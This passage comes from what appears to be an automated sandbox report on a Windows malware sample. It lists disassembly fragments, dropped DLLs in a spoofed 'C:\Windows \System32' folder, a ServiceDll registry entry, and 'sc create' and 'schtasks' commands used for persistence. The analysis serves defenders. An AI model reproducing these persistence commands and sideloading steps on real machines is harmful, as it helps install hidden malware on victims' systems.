    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FF9C51551B8 push es; retf 34_2_00007FF9C5158447
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FF9C5158341 push es; retf 34_2_00007FF9C5158447
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FF9C53B46DC push ds; retf 34_2_00007FF9C53B474F
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FF9C53B7BD4 push esi; ret 34_2_00007FF9C53B7BD7
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FF9C54F711E pushfd ; iretd 34_2_00007FF9C54F7121
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FF9C54F61CC pushad ; iretd 34_2_00007FF9C54F6251
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FF9C5750080 push esp; iretd 34_2_00007FF9C5750139
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FF9C57537F0 push eax; retf 34_2_00007FF9C5753889
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FF9C57537EB push eax; retf 34_2_00007FF9C5753889
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FF9C575000B push esp; iretd 34_2_00007FF9C5750139
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FF9C5753840 push eax; retf 34_2_00007FF9C5753889
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FF9C58B612E push esp; retf 34_2_00007FF9C58B6139
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FF9C5B97050 push ebx; ret 34_2_00007FF9C5B9BE7A
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FF9C5B7746E push eax; iretd 34_2_00007FF9C5B7747D
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FF9C5B77430 pushad ; iretd 34_2_00007FF9C5B7746D
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_649487B2 push r11; ret 46_2_649487ED
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_660224A8 push rax; retf 46_2_660224B1
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_6829984B push 00000000h; retf 46_2_68299850
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_682970AC push rax; iretd 46_2_682970AD
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_6829998B push 00000000h; ret 46_2_68299990
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_6829999B push 00000000h; iretd 46_2_682999A0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_6829AA73 push 00000000h; ret 46_2_6829AA78
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_6829ABBB push 00000000h; retf 46_2_6829ABC0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_6829ABB3 push 00000000h; ret 46_2_6829ABB8
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_6829A7AB push 00000000h; iretd 46_2_6829A7B0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE3C2B8 push 050001C2h; retn 0001h46_2_00007FFA2CE3C2C5
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE3C2D0 push 680001C2h; retn 0001h46_2_00007FFA2CE3C2D5
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE3C2C8 push 680001C2h; retn 0001h46_2_00007FFA2CE3C2CD

    Persistence and Installation Behavior

    barindex
    Creates a Windows Service pointing to an executable in C:\Windows
    Source: C:\Windows\System32\reg.exeKey value created or modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\x338625\Parameters ServiceDll C:\Windows\System32\x338625.dat
    Drops executables to the windows directory (C:\Windows) and starts them
    Source: C:\Windows\System32\cmd.exeExecutable created and started: C:\Windows\System32\console_zero.exe
    Source: C:\Windows\System32\cmd.exeExecutable created and started: C:\Windows \System32\printui.exeJump to behavior
    Source: C:\Windows\System32\xcopy.exeFile created: C:\Windows \System32\printui.exeJump to dropped file
    Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libcurl.dllJump to dropped file
    Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\vcruntime140d.dllJump to dropped file
    Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libiconv-2.dllJump to dropped file
    Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libcrypto-3-x64.dllJump to dropped file
    Source: C:\Windows\System32\xcopy.exeFile created: C:\Windows \System32\x249569.datJump to dropped file
    Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libssl-3-x64.dllJump to dropped file
    Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\console_zero.exeJump to dropped file
    Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\x338625.datJump to dropped file
    Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\usvc.datJump to dropped file
    Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libwinpthread-1.dllJump to dropped file
    Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libintl-9.dllJump to dropped file
    Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\zlib1.dllJump to dropped file
    Source: C:\Program Files\7-Zip\7zFM.exeFile created: C:\Users\user\AppData\Local\Temp\7zE4809A201\rootdir\x249569.datJump to dropped file
    Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\ucrtbased.dllJump to dropped file
    Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libpq.dllJump to dropped file
    Source: C:\Windows\System32\xcopy.exeFile created: C:\Windows \System32\printui.exeJump to dropped file
    Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libcurl.dllJump to dropped file
    Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\vcruntime140d.dllJump to dropped file
    Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libiconv-2.dllJump to dropped file
    Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libcrypto-3-x64.dllJump to dropped file
    Source: C:\Windows\System32\xcopy.exeFile created: C:\Windows \System32\x249569.datJump to dropped file
    Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libssl-3-x64.dllJump to dropped file
    Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\console_zero.exeJump to dropped file
    Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\x338625.datJump to dropped file
    Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\usvc.datJump to dropped file
    Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libwinpthread-1.dllJump to dropped file
    Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libintl-9.dllJump to dropped file
    Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\zlib1.dllJump to dropped file
    Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\ucrtbased.dllJump to dropped file
    Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libpq.dllJump to dropped file

    Boot Survival

    barindex
    Uses schtasks.exe or at.exe to add and modify task schedules
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /delete /tn "console_zero" /f
    Source: C:\Windows\System32\reg.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\x338625\Parameters
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create x338625 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto

    Hooking and other Techniques for Hiding and Protection

    barindex
    Loading BitLocker PowerShell Module
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
